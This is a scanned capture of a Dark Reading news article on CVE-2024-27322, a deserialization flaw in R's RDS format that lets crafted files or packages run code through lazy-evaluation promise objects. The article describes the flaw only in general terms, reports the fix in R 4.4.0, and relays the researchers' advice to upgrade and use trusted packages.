www.darkreading.com Open in urlscan Pro
2606:4700::6810:e1ab  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Dark Reading is part of the Informa Tech Division of Informa PLC
Informa PLC|ABOUT US|INVESTOR RELATIONS|TALENT
This site is operated by a business or businesses owned by Informa PLC and all
copyright resides with them. Informa PLC's registered office is 5 Howick Place,
London SW1P 1WG. Registered in England and Wales and Scotlan. Number 8860726.

Black Hat NewsOmdia Cybersecurity

Newsletter Sign-Up

Newsletter Sign-Up

Cybersecurity Topics

RELATED TOPICS

 * Application Security
 * Cybersecurity Careers
 * Cloud Security
 * Cyber Risk
 * Cyberattacks & Data Breaches
 * Cybersecurity Analytics
 * Cybersecurity Operations
 * Data Privacy
 * Endpoint Security
 * ICS/OT Security

 * Identity & Access Mgmt Security
 * Insider Threats
 * IoT
 * Mobile Security
 * Perimeter
 * Physical Security
 * Remote Workforce
 * Threat Intelligence
 * Vulnerabilities & Threats


World

RELATED TOPICS

 * DR Global

 * Middle East & Africa

See All
The Edge
DR Technology
Events

RELATED TOPICS

 * Upcoming Events

 * Webinars

SEE ALL
Resources

RELATED TOPICS

 * Library
 * Newsletters
 * Reports
 * Videos
 * Webinars
 * Whitepapers

 * 
 * 
 * 
 * 
 * Partner Perspectives:
 * > Microsoft

SEE ALL


 * Application Security
 * Vulnerabilities & Threats
 * Threat Intelligence


R PROGRAMMING BUG EXPOSES ORGS TO VAST SUPPLY CHAIN RISK

The CVE-2024-27322 security vulnerability in R's deserialization process gives
attackers a way to execute arbitrary code in target environments via specially
crafted files.

Jai Vijayan, Contributing Writer

April 29, 2024

4 Min Read
Source: Billion Photos via Shutterstock


A high-severity vulnerability in an R programming language process could expose
organizations using the popular open source language to attacks via the software
supply chain.

The vulnerability, assigned CVE-2024-27322, has a CVSS vulnerability-severity
score of 8.8 out of 10. It involves R's process for deserializing data, or
converting objects encoded in formats such as JSON, XML, and binary, back to
their original form for use in an application or program.

R is a relatively widely used language for statistical computing and graphics
applications. It is popular among developers in sectors such as financial
services, healthcare, research, government and in environments involving large
datasets such as AI and machine learning. The Comprehensive R Archive Network
(CRAN), which is the most popular R package repository, currently hosts more
than 20,000 packages, while R-Forge, a site that provides R package development
tools, has more than 15,800 registered members and hosts some 2,146 projects.




DESERIALIZATION ISSUE



Researchers at HiddenLayer found a weakness in R's process that gives attackers
a way to execute arbitrary code in a victim environment via a specially crafted
R Data Serialization (RDS) file. Programmers commonly use RDS files to store or
save objects in R for future use or for sharing with others.

"This vulnerability can be exploited through the loading of RDS files or R
packages, which are often shared between developers and data scientists,"
HiddenLayer researchers Kasimir Schulz and Kieran Evans said in a report this
week. "An attacker can create malicious RDS files or R packages containing
embedded arbitrary R code that executes on the victim’s target device upon
interaction," according to the report.



The maintainers of R have addressed the issue in R version 4.4.0 after
HiddenLayer informed them of the issue.


A LAZY PROMISE ALLOWS TINKERING

The vulnerability in R that HiddenLayer discovered relates to two fundamental
concepts in R, called "lazy evaluation" and "promise objects." Lazy evaluation
is a programming technique where an R program does not evaluate an expression or
variable until actually required to, or when directly accessed. The goal is to
improve performance by avoiding computations for expressions that might end up
not being needed. A promise object is closely related to lazy evaluation and
represents the object that has been delayed for evaluation.



What the researchers at HiddenLayer discovered was a way to create a promise
object with a payload that would run code of their choice when the object was
accessed during RDS file deserialization.

"R packages leverage the RDS format to save and load data," according to
HiddenLayer. Two files that facilitate this process are an .rdb file that
contains all the serialized objects to be included in a package, and an .rdx
file that contains metadata about each of the objects.

"When a package is loaded, the metadata stored in the RDS format within the .rdx
file is used to locate the objects within the .rdb file," according to the
analysis. The objects within the .rdb files are then deserialized.

"An attacker can exploit this by creating an RDS file that contains a specially
crafted promise object embedded with arbitrary code," Schulz tells Dark Reading.
"Due to the way R implements lazy evaluation, the embedded arbitrary code will
be executed once a user has loaded the malicious file or package." An attacker
can relatively easily add a weaponized package to an R repository such as CRAN
and simply wait for an unwary user to load that package.




POTENTIALLY VAST ATTACK SURFACE: MULTIPLE INFECTION SOURCES

There are literally dozens of major hubs, such as R-Forget and Bioconductor,
that R developers use to share and download packages. Not only are these hubs
providing developers with access to thousands of packages, some, like
Bioconductor, with more than 42 million downloads are being used regularly,
Schulz says. "Someone just needs to take advantage of the vulnerability and the
massive open source space for R packages to affect thousands of downstream users
in a potentially massive supply chain attack," he says.

Schulz recommends that organizations move to the latest version of R to mitigate
risk: "In addition, organizations should ensure that users of R are made aware
of current and potential future vulnerabilities of this nature and make it
policy to only use known trusted files and packages."




ABOUT THE AUTHOR(S)

Jai Vijayan, Contributing Writer



Jai Vijayan is a seasoned technology reporter with over 20 years of experience
in IT trade journalism. He was most recently a Senior Editor at Computerworld,
where he covered information security and data privacy issues for the
publication. Over the course of his 20-year career at Computerworld, Jai also
covered a variety of other technology topics, including big data, Hadoop,
Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai
covered technology issues for The Economic Times in Bangalore, India. Jai has a
Master's degree in Statistics and lives in Naperville, Ill.

See more from Jai Vijayan, Contributing Writer
Keep up with the latest cybersecurity threats, newly discovered vulnerabilities,
data breach information, and emerging trends. Delivered daily or weekly right to
your email inbox.

Subscribe

You May Also Like

--------------------------------------------------------------------------------

Application Security

The Most Popular IT Admin Password Is Totally Depressing
Application Security

MGM, Caesars Cyberattack Responses Required Brutal Choices
Application Security

T-Mobile Racks Up Third Consumer Data Exposure of 2023
Application Security

Mass Exploitation of Zero-Day Bug in MOVEit File Transfer Underway
More Insights
Webinars

 * Beyond Spam Filters and Firewalls: Preventing Business Email Compromises in
   the Modern Enterprise
   
   April 30, 2024

 * Key Findings from the State of AppSec Report 2024
   
   May 7, 2024

 * Is AI Identifying Threats to Your Network?
   
   May 14, 2024

 * Where and Why Threat Intelligence Makes Sense for Your Enterprise Security
   Strategy
   
   May 15, 2024

 * Safeguarding Political Campaigns: Defending Against Mass Phishing Attacks
   
   May 16, 2024

More Webinars
Events

 * Black Hat USA - August 3-8 - Learn More
   
   August 3, 2024

 * Cybersecurity's Hottest New Technologies: What You Need To Know
   
   March 21, 2024

More Events



EDITOR'S CHOICE

Man in a suit drawing development graph strategy on gray wall
Cybersecurity Operations
CISO Corner: Evil SBOMs; Zero-Trust Pioneer Slams Cloud Security; MITRE's Ivanti
IssueCISO Corner: Evil SBOMs; ZT Pioneer Slams Cloud Security; MITRE's Ivanti
Issue
byTara Seals, Managing Editor, News, Dark Reading
Apr 26, 2024
9 Min Read

The Manila skyline
Cyberattacks & Data Breaches
Philippines Pummeled by Assortment of Cyberattacks & Misinformation Tied to
ChinaPhilippines Pummeled by Mix of Cyberattacks & Misinfo Tied to China
byJohn Leyden, Contributing Writer
Apr 26, 2024
5 Min Read
Vector drawing of CPU with lock symbol on stylized circuit board
Endpoint Security
Chip Giants Finalize Specs Baking Security Into SiliconChip Giants Finalize
Specs Baking Security Into Silicon
byAgam Shah, Contributing Writer
Apr 25, 2024
2 Min Read

Mobile phone with logo of American consumer health products company Kenvue Inc.
in front of website
Identity & Access Management Security
J&J Spin-Off CISO on Maximizing CybersecurityJ&J Spin-Off CISO on Maximizing
Cybersecurity
byKaren D. Schwartz, Contributing Writer
Apr 25, 2024
4 Min Read
Reports

 * Industrial Networks in the Age of Digitalization

 * Zero-Trust Adoption Driven by Data Protection

 * How Enterprises Assess Their Cyber-Risk

 * Zero Trust and the Power of Isolation for Threat Prevention

 * SANS Institute Survey: The State of Cloud Security

More Reports
White Papers

 * A Short Primer on Container Scanning

 * Cisco Panoptica for Simplified Cloud-Native Application Security

 * Making Sense of Your Security Data: The 6 Hardest Problems

 * The State of Incident Response

 * Understanding Today's Threat Actors

More Whitepapers
Events

 * Black Hat USA - August 3-8 - Learn More
   
   August 3, 2024

 * Cybersecurity's Hottest New Technologies: What You Need To Know
   
   March 21, 2024

More Events





DISCOVER MORE WITH INFORMA TECH

Black HatOmdia

WORKING WITH US

About UsAdvertiseReprints

JOIN US


Newsletter Sign-Up

FOLLOW US



Copyright © 2024 Informa PLC Informa UK Limited is a company registered in
England and Wales with company number 1072954 whose registered office is 5
Howick Place, London, SW1P 1WG.

Home|Cookie Policy|Privacy|Terms of Use